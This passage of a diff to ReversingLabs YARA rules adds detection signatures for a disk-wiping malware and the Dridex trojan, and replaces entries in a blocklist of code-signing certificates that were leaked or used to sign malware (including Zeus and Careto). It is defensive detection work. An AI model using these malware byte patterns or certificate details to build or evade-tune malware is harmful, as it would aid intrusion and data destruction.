+            74 ?? E9 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 8B 55 ?? 52 8D 85 ?? ?? ?? ?? 50 E8 ?? ??
+            ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? 51 8D 95 ?? ?? ?? ?? 52 8D 85 ?? ?? ?? ?? 50 E8 ??
+            ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 8D 95 ?? ?? ?? ?? 52
+            E8 ?? ?? ?? ?? 83 C4 ?? E9 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8B 4D ?? 51 8D 95 ?? ??
+            ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? 51 8D 95 ??
+            ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 85
+        }
+		$erase_drives_recursively_2_p2 = {
+            C0 75 ?? E9 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 8D 8D
+            ?? ?? ?? ?? 51 FF 95 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 75 ?? E9 ??
+            ?? ?? ?? 6A ?? 8B 95 ?? ?? ?? ?? 52 FF 95 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD ?? ??
+            ?? ?? ?? 73 ?? E9 ?? ?? ?? ?? 81 BD ?? ?? ?? ?? ?? ?? ?? ?? 76 ?? C7 85 ?? ?? ?? ??
+            ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 50 6A ?? FF 95 ?? ?? ??
+            ?? 89 85 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 51 8B 95 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4
+            ?? 6A ?? 6A ?? 6A ?? 8B 85 ?? ?? ?? ?? 50 FF 95 ?? ?? ?? ?? 6A ?? 8D 8D ?? ?? ?? ??
+            51 8B 95 ?? ?? ?? ?? 52 8B 85 ?? ?? ?? ?? 50 8B 8D ?? ?? ?? ?? 51 FF 95 ?? ?? ?? ??
+            8B 95 ?? ?? ?? ?? 52 FF 95 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 50 FF 55 ?? 8D 8D ?? ?? ??
+            ?? 51 8B 95 ?? ?? ?? ?? 52 FF 95 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8B 85 ?? ?? ??
+            ?? 50 FF 95 ?? ?? ?? ?? 8B E5 5D C3
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "NOSOV SP Z O O" and pe.signatures [ i ] . serial == "0b:ab:6a:2a:a8:4b:49:5d:9e:55:4a:4c:42:c0:12:6d" and 1597971600 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( $destroy_if_not_controller ) and ( $erase_drive_data ) and ( all of ( $erase_drives_recursively_* ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_6314001C3235Cd59Bcc3F5278C518804 : INFO FILE
+rule REVERSINGLABS_Win32_Trojan_Dridex : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects Dridex trojan."
 		author = "ReversingLabs"
-		id = "aff0fb76-587b-5493-810c-ac32a6ba9576"
-		date = "2020-08-05"
-		modified = "2023-11-08"
+		id = "bc68aca1-69e6-57e6-9277-70c89fda1e5d"
+		date = "2020-06-26"
+		modified = "2020-09-16"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L5902-L5918"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/trojan/Win32.Trojan.Dridex.yara#L1-L80"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "4320f3884c0f7e4939e8988a4e83b8028a5e01fb425ae4faa2273134db835813"
+		logic_hash = "7eddc8f33846dfb61302b7d7fddd8dec59a1bde05b14135c14131a02e2c19600"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Trojan"
+		tc_detection_name = "Dridex"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$resolve_api_wrapper_1 = {
+            56 57 8B FA 8B F1 8B CF E8 ?? ?? ?? ?? 85 C0 75 ?? 81 FE ?? ?? ?? ?? 75 ?? 33 C0 5F
+            5E C3 8B CE E8 ?? ?? ?? ?? 85 C0 75 ?? 8B CE E8 ?? ?? ?? ?? 84 C0 74 ?? 8B CE E8 ??
+            ?? ?? ?? 85 C0 74 ?? 8B D7 ?? ?? ?? ?? E9
+        }
+		$resolve_api_wrapper_2 = {
+            57 53 8B FA 8B D9 8B CF E8 ?? ?? ?? ?? 85 C0 75 ?? 81 FB ?? ?? ?? ?? 74 ?? 8B CB E8
+            ?? ?? ?? ?? 85 C0 74 ?? 8B C8 8B D7 E8 ?? ?? ?? ?? 5B 5F C3 8B CB E8 ?? ?? ?? ?? 84
+            C0 74 ?? 8B CB E8 ?? ?? ?? ?? 85 C0 75 ?? 33 C0 EB
+        }
+		$resolve_api_wrapper_3 = {
+            55 8B EC 57 8B 7D ?? 57 E8 ?? ?? ?? ?? 85 C0 75 ?? 56 8B 75 ?? 81 FE ?? ?? ?? ?? 74
+            ?? 56 E8 ?? ?? ?? ?? 85 C0 75 ?? 8B CE E8 ?? ?? ?? ?? 84 C0 74 ?? 56 E8 ?? ?? ?? ??
+            85 C0 75 ?? 5E 33 C0 5F 5D C2 ?? ?? 57 50 E8 ?? ?? ?? ?? 5E 5F 5D C2
+        }
+		$resolve_api_wrapper_4 = {
+            55 8B EC FF 75 ?? E8 ?? ?? ?? ?? 85 C0 75 ?? 56 8B 75 ?? 81 FE ?? ?? ?? ?? 74 ?? 56
+            E8 ?? ?? ?? ?? 85 C0 75 ?? 8B CE E8 ?? ?? ?? ?? 84 C0 74 ?? 56 E8 ?? ?? ?? ?? 85 C0
+            74 ?? 5E 89 45 ?? 5D E9
+        }
+		$find_first_file_snippet_1 = {
+            53 56 8B F1 57 33 DB 32 C9 89 5E ?? 33 FF E8 ?? ?? ?? ?? 83 38 ?? 7C ?? [4-6] BA ??
+            ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 74 ?? 8B 4E ?? 57 6A ?? 6A ?? 8D 56 ??
+            52 53 51 FF D0
+        }
+		$find_first_file_snippet_2 = {
+            57 53 55 8B E9 33 C9 C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? B9 ?? ?? ?? ?? BA ?? ?? ??
+            ?? 8B 18 E8 ?? ?? ?? ?? 8B C8 85 C9 74 ?? 33 D2 83 FB ?? 6A ?? 5B 8D 7D ?? 0F 4C DA
+            8B C2 53 52 52 57 0F 9D C0 50 FF 75 ?? FF D1
+        }
+		$find_first_file_snippet_3 = {
+            53 56 8B F1 33 DB 57 32 C9 89 5E ?? E8 ?? ?? ?? ?? BA ?? ?? ?? ?? B9 ?? ?? ?? ?? 8B
+            38 E8 ?? ?? ?? ?? 8B D0 85 D2 74 ?? 6A ?? 33 C0 83 FF ?? 59 0F 4C C8 8D 46 ?? 51 53
+            53 50 33 C0 83 FF ?? 0F 9D C0 50 FF 76 ?? FF D2
+        }
+		$find_first_file_snippet_4 = {
+            53 56 8B F1 57 33 DB 32 C9 89 5E ?? 33 FF E8 ?? ?? ?? ?? 83 38 ?? 7C ?? 8D 7B ?? 8D
+            5F ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 74 ?? 8B 4E ?? 57 6A ?? 6A
+            ?? 8D 56 ?? 52 53 51 CC C3
+        }
+		$find_first_file_snippet_5 = {
+            56 8B F1 32 C9 57 C7 46 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ??
+            8B 38 E8 ?? ?? ?? ?? 8B D0 85 D2 74 ?? 33 C0 B9 ?? ?? ?? ?? 83 FF ?? 0F 4C C8 51 50
+            50 8D 46 ?? 50 33 C0 83 FF ?? 0F 9D C0 50 FF 76 ?? FF D2
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "GIE-MUTUALISTE" and pe.signatures [ i ] . serial == "63:14:00:1c:32:35:cd:59:bc:c3:f5:27:8c:51:88:04" and 1600304400 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( any of ( $resolve_api_wrapper_* ) and any of ( $find_first_file_snippet_* ) )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_0Ed8Ade5D73B73Dade6943D557Ff87E5 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_05E2E6A4Cd09Ea54D665B075Fe22A256 : INFO FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "The digital certificate has leaked."
 		author = "ReversingLabs"
-		id = "dbfae40c-2f81-5daf-8655-d06ae38ffa8f"
+		id = "824c6b2f-081a-5f38-b949-d802f59e6ced"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L5920-L5936"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L27-L43"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "7796b6e7da900be8634e7f1e51cda1275ab1e7c2709af7ecaa8777ab0b518494"
+		logic_hash = "43da21d9c7ae9bfcc7fe4ee69f9d46cbce1954785d56c1d424b36deb8afe592e"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -15365,21 +37759,21 @@ rule REVERSINGLABS_Cert_Blocklist_0Ed8Ade5D73B73Dade6943D557Ff87E5 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Rumikon LLC" and pe.signatures [ i ] . serial == "0e:d8:ad:e5:d7:3b:73:da:de:69:43:d5:57:ff:87:e5" and 1597885200 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "*.google.com" and pe.signatures [ i ] . serial == "05:e2:e6:a4:cd:09:ea:54:d6:65:b0:75:fe:22:a2:56" and 1308182400 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_0292C7D574132Ba5C0441D1C7Ffcb805 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_77019A082385E4B73F569569C9F87Bb8 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "ef58cf01-9c54-5dbb-99a7-d3ca42663133"
+		id = "4046a31b-d7c8-5c63-b5b2-2179b0817b03"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L5938-L5954"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L45-L61"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "d2bcf72f4c5829d161bc40e820eb0b1a85deaa49b749422d5429e27b7fb2b1fe"
+		logic_hash = "8613986005bdd30d92e633fa2058be5c43f1c530b9dc6d80ec953f12f6d66ce7"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -15389,21 +37783,21 @@ rule REVERSINGLABS_Cert_Blocklist_0292C7D574132Ba5C0441D1C7Ffcb805 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "TES LOGISTIKA d.o.o." and pe.signatures [ i ] . serial == "02:92:c7:d5:74:13:2b:a5:c0:44:1d:1c:7f:fc:b8:05" and 1602183720 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "AND LLC" and pe.signatures [ i ] . serial == "77:01:9a:08:23:85:e4:b7:3f:56:95:69:c9:f8:7b:b8" and 1308182400 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_1F23F001458716D435Cca1A55D660Ec5 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_4F2Ef29Ca5F96E5777B82C62F34Fd3A6 : INFO FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "The digital certificate has leaked."
 		author = "ReversingLabs"
-		id = "16614e20-1cf1-55c0-a04c-d99c06fb29a2"
+		id = "6cfb6ae0-8eba-503b-8bb7-ac72746d9aa2"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L5956-L5972"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L63-L79"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "bacfb4b7900ab57d23474e0422bd74fff113296b8db37e8eae3bd456443d28d6"
+		logic_hash = "e8f27c4a72f416a16acabb1de606fdde7dc694256809fdb952a25313dda0d34e"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -15413,21 +37807,21 @@ rule REVERSINGLABS_Cert_Blocklist_1F23F001458716D435Cca1A55D660Ec5 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OOO Ringen" and pe.signatures [ i ] . serial == "1f:23:f0:01:45:87:16:d4:35:cc:a1:a5:5d:66:0e:c5" and 1603176940 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Bit9, Inc" and pe.signatures [ i ] . serial == "4f:2e:f2:9c:a5:f9:6e:57:77:b8:2c:62:f3:4f:d3:a6" and 1342051200 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_6E0Ccbdfb4777E10Ea6221B90Dc350C2 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_7Cc1Db2Ad0A290A4Bfe7A5F336D6800C : INFO FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "The digital certificate has leaked."
 		author = "ReversingLabs"
-		id = "64007bd7-b273-5579-8224-68337f1bc54d"
+		id = "89bc7c99-dea2-50ce-a0d2-4292c14d049e"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L5974-L5990"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L81-L97"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "08a1ff7cc3a7680fdbb3235a7b46709cd4ba530a9afeab4344671db9fe893cc4"
+		logic_hash = "c9f91edb525a02041bc20dff25ec58323f8fabd4d2a2eca63238ecb10ccef2a6"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -15437,21 +37831,21 @@ rule REVERSINGLABS_Cert_Blocklist_6E0Ccbdfb4777E10Ea6221B90Dc350C2 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "TRAUMALAB INTERNATIONAL APS" and pe.signatures [ i ] . serial == "6e:0c:cb:df:b4:77:7e:10:ea:62:21:b9:0d:c3:50:c2" and 1603046620 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Bit9, Inc" and pe.signatures [ i ] . serial == "7c:c1:db:2a:d0:a2:90:a4:bf:e7:a5:f3:36:d6:80:0c" and 1342051200 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_0Ed1847A2Ae5D71Def1E833Fddd33D38 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_13C8351Aece71C731158980F575F4133 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "11fd3bbe-5d15-57b7-a461-fc9c90046dbc"
+		id = "b6a1eb97-f0da-571e-951c-57f49cf62057"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L5992-L6008"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L99-L115"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "0ec5eb8ff1f630284fabfba5c58dd563d471343ace718f79dad08cfe75c3070d"
+		logic_hash = "f96723845adc8030b72c119311103d5c2cf136e79de226d31141d8b925ce8e75"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -15461,21 +37855,21 @@ rule REVERSINGLABS_Cert_Blocklist_0Ed1847A2Ae5D71Def1E833Fddd33D38 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SNAB-RESURS, OOO" and pe.signatures [ i ] . serial == "0e:d1:84:7a:2a:e5:d7:1d:ef:1e:83:3f:dd:d3:3d:38" and 1598662800 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Opera Software ASA" and pe.signatures [ i ] . serial == "13:c8:35:1a:ec:e7:1c:73:11:58:98:0f:57:5f:41:33" and 1371513600 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_97Df46Acb26B7C81A13Cc467B47688C8 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_4531954F6265304055F66Ce4F624F95B : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "68e2fdc7-61cd-5e0a-8bc7-5e0ca96271c5"
+		id = "da1aaa4c-ac71-5c4c-b663-3d1b57d69040"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L6010-L6028"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L117-L133"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "6f6e0e175caee83eaec2dacedaf564b642195a8815cfd0d4564f581070b0c545"
+		logic_hash = "58d3a2a5e3f6730f329bddb171ad6332794fa95848825b892c3b8324f503ae89"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -15485,21 +37879,21 @@ rule REVERSINGLABS_Cert_Blocklist_97Df46Acb26B7C81A13Cc467B47688C8 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Information Civilized System Oy" and ( pe.signatures [ i ] . serial == "00:97:df:46:ac:b2:6b:7c:81:a1:3c:c4:67:b4:76:88:c8" or pe.signatures [ i ] . serial == "97:df:46:ac:b2:6b:7c:81:a1:3c:c4:67:b4:76:88:c8" ) and 1602636910 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "IDAutomation.com" and pe.signatures [ i ] . serial == "45:31:95:4f:62:65:30:40:55:f6:6c:e4:f6:24:f9:5b" and 1384819199 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_186D49Fac34Ce99775B8E7Ffbf50679D : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_0E808F231515Bc519Eea1A73Cdf3266F : INFO FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Certificate used for digitally signing Careto malware."
 		author = "ReversingLabs"
-		id = "9279d4ee-3f53-5d68-aaa1-af6ed579310f"
+		id = "1f1eb5c2-bfef-58df-b51e-c558d87cd5d2"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L6030-L6046"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L135-L151"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "0444a5052ee384451ebd85918bbc6bf6d6a75334899a63a8b5828ef06cb9c7ca"
+		logic_hash = "05e466e304ed7a8f5c1c93aac4a4b7019d6fb1e07aeb45d078b657f838d1f3bd"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -15509,21 +37903,21 @@ rule REVERSINGLABS_Cert_Blocklist_186D49Fac34Ce99775B8E7Ffbf50679D : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Hairis LLC" and pe.signatures [ i ] . serial == "18:6d:49:fa:c3:4c:e9:97:75:b8:e7:ff:bf:50:67:9d" and 1602234590 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "TecSystem Ltd." and pe.signatures [ i ] . serial == "0e:80:8f:23:15:15:bc:51:9e:ea:1a:73:cd:f3:26:6f" and 1468799999 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_B1Aea98Bf0Ce789B6C952310F14Edde0 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_36Be4Ad457F062Fa77D87595B8Ccc8Cf : INFO FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Certificate used for digitally signing Careto malware."
 		author = "ReversingLabs"
-		id = "f039f379-e3d5-56bd-83b7-016881538017"
+		id = "224ec8ed-e4f0-5d1b-8cdd-a669a7e3e859"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L6048-L6066"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L153-L169"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "6e78750d6aca91e9e6d8f2651a5682ccdab5cd20ee3a74e1f8582eb7bc45d614"
+		logic_hash = "d19a6f22a1e702a4da69c867195722adf8f1dd84539f2c584af428fe4b1caf79"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -15533,21 +37927,21 @@ rule REVERSINGLABS_Cert_Blocklist_B1Aea98Bf0Ce789B6C952310F14Edde0 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Absolut LLC" and ( pe.signatures [ i ] . serial == "00:b1:ae:a9:8b:f0:ce:78:9b:6c:95:23:10:f1:4e:dd:e0" or pe.signatures [ i ] . serial == "b1:ae:a9:8b:f0:ce:78:9b:6c:95:23:10:f1:4e:dd:e0" ) and 1602612570 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "TecSystem Ltd." and pe.signatures [ i ] . serial == "36:be:4a:d4:57:f0:62:fa:77:d8:75:95:b8:cc:c8:cf" and 1372377599 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_2Dcd0699Da08915Dde6D044Cb474157C : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_75A38507Bf403B152125B8F5Ce1B97Ad : INFO FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Certificate used for digitally signing Zeus malware."
 		author = "ReversingLabs"
-		id = "e1f56719-e726-5f81-99d4-937e343cbcc9"
+		id = "6805abd8-217e-5179-ab5a-297e2a17e65e"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L6068-L6084"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L171-L187"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "e1a3f27b8b9b642fe1ca73ec54d225f4470b53d0d06f2eea55ad1ad43ec67b39"
+		logic_hash = "af21cee3ee92268c3aa0106a245e5a00c5ba892fca3e4fd2dc55e302ed5d470a"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -15557,21 +37951,21 @@ rule REVERSINGLABS_Cert_Blocklist_2Dcd0699Da08915Dde6D044Cb474157C : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "VENTE DE TOUT" and pe.signatures [ i ] . serial == "2d:cd:06:99:da:08:91:5d:de:6d:04:4c:b4:74:15:7c" and 1601830010 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "isonet ag" and pe.signatures [ i ] . serial == "75:a3:85:07:bf:40:3b:15:21:25:b8:f5:ce:1b:97:ad" and 1395359999 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_4B03Cabe6A0481F17A2Dbeb9Aefad425 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_4Effa8B216E24B16202940C1Bc2Fa8A5 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "30108ce3-b133-5e1d-924f-7caaf390e836"
+		id = "541a169e-a263-5901-9d8e-768306b8b8ba"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L6086-L6102"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L189-L205"
